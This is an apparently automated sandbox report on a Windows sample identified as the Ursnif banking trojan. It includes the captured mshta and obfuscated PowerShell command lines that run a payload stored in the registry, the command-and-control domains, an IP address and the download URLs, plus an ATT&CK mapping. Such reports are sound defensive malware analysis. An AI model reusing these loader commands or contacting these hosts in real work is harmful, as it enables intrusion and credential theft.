                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\Desktop\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9567
                Source: C:\Users\user\Desktop\main.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\Desktop\main.exeProcess information queried: ProcessInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,
                Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>w6wy='wscript.shell';resizeto(0,2);eval(new activexobject(w6wy).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([system.text.encoding]::ascii.getstring((fuuocwpse "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([system.text.encoding]::ascii.getstring((fuuocwpse "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\Desktop\main.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D54EC cpuid
                Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                Stealing of Sensitive Information

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Windows Management Instrumentation                		Path Interception11
                Process Injection                		21
                Virtualization/Sandbox Evasion                		1
                Input Capture                		1
                System Time Discovery                		Remote Services1
                Email Collection                		Exfiltration Over Other Network Medium2
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default Accounts1
                Command and Scripting Interpreter                		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
                Process Injection                		LSASS Memory1
                Security Software Discovery                		Remote Desktop Protocol1
                Input Capture                		Exfiltration Over Bluetooth2
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts3
                Native API                		Logon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information                		Security Account Manager21
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares11
                Archive Collected Data                		Automated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                Software Packing                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer12
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                Application Window Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                Account Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                System Owner/User Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Remote System Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                File and Directory Discovery                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing35
                System Information Discovery                		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 747122 Sample: main.exe Startdate: 16/11/2022 Architecture: WINDOWS Score: 100 18 lentaphoto.at 2->18 24 Snort IDS alert for network traffic 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 3 other signatures 2->30 8 main.exe 6 2->8         started        12 mshta.exe 19 2->12         started        signatures3 process4 dnsIp5 20 iujdhsndjfks.ru 134.0.118.203, 49698, 80 AS-REGRU Russian Federation 8->20 22 lentaphoto.at 8->22 32 Writes or reads registry keys via WMI 8->32 34 Writes registry values via WMI 8->34 14 powershell.exe 15 12->14         started        signatures6 process7 process8 16 conhost.exe 14->16         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                main.exe62%VirustotalBrowse
                main.exe100%AviraTR/Crypt.XPACK.Gen7
                main.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.main.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                0.0.main.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                0.2.main.exe.6d0000.1.unpack100%AviraHEUR/AGEN.1245293Download File

                Domains

                SourceDetectionScannerLabelLink
                iujdhsndjfks.ru0%VirustotalBrowse
                lentaphoto.at1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://iujdhsndjfks.ru/0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct0%Avira URL Cloudsafe
                http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct0%Avira URL Cloudsafe
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                iujdhsndjfks.ru
                		134.0.118.203
                		truetrueunknown
                lentaphoto.at
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pcttrue
                • Avira URL Cloud: safe
                		unknown
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pcttrue
                • Avira URL Cloud: safe
                		unknown
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pcttrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://iujdhsndjfks.ru/main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTmain.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://go.micropowershell.exe, 0000000F.00000002.524619669.00000265A9BE3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDSmain.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.508025334.00000265A80B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHmain.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          134.0.118.203
                          		iujdhsndjfks.ruRussian Federation
                          		197695AS-REGRUtrue

                          General Information

                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:747122
                          Start date and time:2022-11-16 02:12:09 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 5m 16s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:main.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:17
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.winEXE@5/2@3/1
                          EGA Information:
                          • Successful, ratio: 33.3%
                          HDC Information:
                          • Successful, ratio: 45.9% (good quality ratio 44.3%)
                          • Quality average: 83.5%
                          • Quality standard deviation: 25.8%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
                          • Execution Graph export aborted for target mshta.exe, PID 2388 because there are no executed function
                          • Execution Graph export aborted for target powershell.exe, PID 2620 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          02:15:01API Interceptor17x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints
